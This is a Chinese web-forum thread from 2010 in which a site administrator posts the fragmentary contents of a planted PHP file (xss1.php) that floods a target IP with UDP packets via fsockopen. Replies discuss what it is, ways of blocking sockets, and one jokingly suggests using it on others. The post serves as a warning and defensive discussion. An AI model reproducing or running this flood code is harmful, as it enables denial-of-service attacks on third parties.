找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 334|回复: 28

发一个php 攻击代码.大家注意.

[复制链接]

108

主题

1268

回帖

3016

积分

论坛元老

积分
3016
发表于 2010-12-4 12:03:10 | 显示全部楼层 |阅读模式

今天收到服务商的警告.说有outgoing dos attack.并给了几个IP让我检查.
检查后发现一个用户的网站应该是被挂马,许多目录下存在这样一个文件: xss1.php,里面的内容如下:[ol]
  • $max_time){                break;        }               
  • $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);        
  • if($fp){                fwrite($fp, $out);               
  • fclose($fp);        }}
  • echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";?>[/ol]复制代码请勿用于非法用途

    [ 本帖最后由 诡谲 于 2010-12-4 12:19 编辑 ]
  • 回复

    使用道具 举报

    426

    主题

    1万

    回帖

    2万

    积分

    论坛元老

    积分
    26628
    发表于 2010-12-4 12:25:28 | 显示全部楼层
    表示看不懂代码的我路过。

    回复

    使用道具 举报

    206

    主题

    1552

    回帖

    3802

    积分

    论坛元老

    积分
    3802
    发表于 2010-12-4 12:26:40 | 显示全部楼层
    这个应该不是马吧!都是代码!没连接地址!
    回复

    使用道具 举报

    136

    主题

    1135

    回帖

    2732

    积分

    金牌会员

    积分
    2732
    发表于 2010-12-4 12:27:54 | 显示全部楼层
    用socket而已,可以禁用的。
    回复

    使用道具 举报

    114

    主题

    1万

    回帖

    2万

    积分

    论坛元老

    积分
    22464
    发表于 2010-12-4 12:27:55 | 显示全部楼层
    难道这是dos??
    回复

    使用道具 举报

    586

    主题

    2413

    回帖

    6698

    积分

    论坛元老

    积分
    6698
    发表于 2010-12-4 12:28:43 | 显示全部楼层
    这个是被挂的马吧?
    相当于个小“僵尸”了,呵呵,接受黑客的URL输入参数IP向该IP的端口发UDP Flood攻击。。
    网站有上传功能的应该小心。

    [ 本帖最后由 liheyuan 于 2010-12-4 12:30 编辑 ]
    回复

    使用道具 举报

    75

    主题

    297

    回帖

    867

    积分

    高级会员

    积分
    867
    发表于 2010-12-4 12:29:06 | 显示全部楼层
    这是端口扫描。
    回复

    使用道具 举报

    38

    主题

    468

    回帖

    1074

    积分

    金牌会员

    积分
    1074
    发表于 2010-12-4 12:29:07 | 显示全部楼层
    呃,看错了,看到65535就自动默认了。。第一行:这个程序不限时,一直执行完毕
    第二行:这个程序不理会使用者是否关闭浏览器,都会在服务器端执行完毕
    后面是fsockopen提交。。。。

    去D别人的吧
    回复

    使用道具 举报

    78

    主题

    1147

    回帖

    2564

    积分

    金牌会员

    积分
    2564
    发表于 2010-12-4 12:30:08 | 显示全部楼层
    还是隐藏吧。无聊的人太多了
    回复

    使用道具 举报

    0

    主题

    1

    回帖

    4

    积分

    新手上路

    积分
    4
    发表于 2010-12-4 12:31:07 | 显示全部楼层
    学习中,

    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Archiver|手机版|小黑屋|Discuz! X

    GMT+8, 2025-4-28 02:37 , Processed in 0.020582 second(s), 3 queries , Gzip On, Redis On.

    Powered by Discuz! X3.5

    © 2001-2024 Discuz! Team.

    快速回复 返回顶部 返回列表